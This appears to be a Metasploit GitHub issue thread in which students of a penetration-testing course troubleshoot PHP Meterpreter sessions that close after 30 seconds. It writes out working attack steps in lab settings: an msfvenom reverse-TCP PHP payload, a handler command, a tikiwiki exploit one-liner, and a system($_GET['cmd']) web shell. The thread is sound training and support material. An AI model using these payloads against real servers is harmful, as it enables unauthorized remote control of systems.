PHP Meterpreter session is not valid and will be closed

[aderon2]

Steps to reproduce

How'd you do it?

attackMachine = 10.0.0.101
victimMachine = 10.0.0.100

1. msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.101 LPORT=1234 -f raw -o shell.php
2. Upload shell.php to webserver running on victimMachine
3. msfconsole -qx 'use exploit/multi/handler; set payload php/meterpreter/reverse_tcp; set LHOST 10.0.0.101; set LPORT 1234; exploit'
4. Access http://10.0.0.100/shell.php from attackMachine

Expected behavior

What should happen?
Should be able to use meterpreter session

Current behavior

What happens instead?

• Handler Output
  [*] Started reverse TCP handler on 10.0.0.101:1234
[*] Sending stage (37543 bytes) to 10.0.0.100
[*] Meterpreter session 1 opened (10.0.0.101:1234 -> 10.0.0.100:1061) at 2017-12-24 23:48:32 -0500
[-] Meterpreter session 1 is not valid and will be closed
[*] 10.0.0.100 - Meterpreter session 1 closed.

This happens during a span of exactly 30 seconds (Believe this is due to AutoVerify failing at the default of 30 seconds). This happens regardless of whether I use a staged or stageless payload. Also, during that 30 seconds I'm not shown a prompt and I'm unable to enter in any commands.

System stuff

Metasploit version

metasploit v4.16.26-dev

I installed Metasploit with:

• [ * ] Came with Kali

OS

What OS are you running Metasploit on?

Kali

[busterb]

Identical to #9342, are you guys taking the same class?

[aderon2]

Nope. Don't know that user. I'm just working through the Georgia Weidman cybrary vids.

[busterb]

Could you point me to where in the course you're at? I'd like to see what the video is saying.

[busterb]

I found it, thanks.

[bew1ldered]

hi @aderon2, were you able to solve this? I am having the same problem following Georgia Weidman's book.

[aderon2]

@bew1ldered @busterb There's got to be something wrong w/ the server from the weidman class (Maybe the version of php?). I had assumed since the server ran other generic php shell code, such as system($_GET['cmd']); without issue, that it wasn't related to the server, but apparently it is.

I set up a test server on ubuntu with php and apache and using the commands I gave in the original bug report, it worked without issue. Hope this helps someone. Thanks

[iraqigeek]

I'm also working through Weidman's book, and have come across this issue. Having continued to the following chapters, I was able to get the tikiwiki php example work on Ubuntu by using AutoRunScript or InitialAutoRunScript to migrate meterpreter to another process. This gives me a meterpreter prompt immediately:

msfconsole -x "use unix/webapp/tikiwiki_graph_formula_exec; set rhost 192.168.0.12; set payload php/meterpreter/reverse_tcp; set lhost 192.168.0.11; InitialAutoRunScript migrate -f; run"

Strangely, the same method (using migrate) doesn't seem to work on the Windows XP examples.

I know scripts are deprecated, but php-meterpreter doesn't seem to have the PrependMigrate option (or am I missing something?).

Hope this helps.

[busterb]

Nice @aderon2! Typically a server will have a configurable amount of time that it will allow a PHP payload to run before it terminates the process. This might be a few seconds, or many minutes. It's a per-site setting at least, so how your server is configured certainly makes a big difference if you don't migrate to another process soon.

The PrependMigrate injects machine code into the payload. ("Prepend" means add assembly to the beginning of the payload), which is why it doesn't work with PHP.

To be more clear about scripts being deprecated, the answer is...complicated. (Initial)AutoRunScript isn't, but until very recently, we didn't apparently give a good way to run anything other than a post-exploit module as an alternative. That very recently changed. I think meterpreter scripts will live a long time still until the recent fixes to allow resource scripts, and soon command shell ability to run resource scripts too, actually get into a major Kali release.

[iraqigeek]

@busterb I assume your last comment was targeted to me, and not aderon2 :P

In my case, it wasn't max_execution_time (I'll also assume that's what you meant when referring to process termination) in php, as that is 60 secs. The issue, at least in my case, was never getting a meterpreter prompt. I tried running the exploit as a job and still it wouldn't establish a session (not even for a few seconds). I noticed the size difference in the stage when using prepend for windows targets, so I figured that part. It still doesn't make much sense to me as to why using the migrate script gets me a meterpreter shell, but without I don't get a shell for even one second :\

And thanks for the comment on the scripts part :)

[nedlir]

So, I had exactly the same problem, and I know this issue is 5 years old, but this is one of the first results on Google, so hopefully my solution helps others too.

The book is a bit dated and relied on older version of Kali Linux which had old version of PHP preinstalled. The system that the author instructs to use in the book is Kali Linux 1.0.6 which ran with PHP version 5.4.4, current version of Kali Linux (2022.3) runs PHP version 8.1.5.

The solution for me was installing the older PHP version and the exploit worked without a problem.

[Asquator]

To contribute to the discussion I'd like to ask - aren't these versioning issues supposed to be resolved on the framework level? Like... If we know that our target runs an outdated PHP version, it would be nice to have an option to choose the PHP version of the payload generated.

Am I missing something?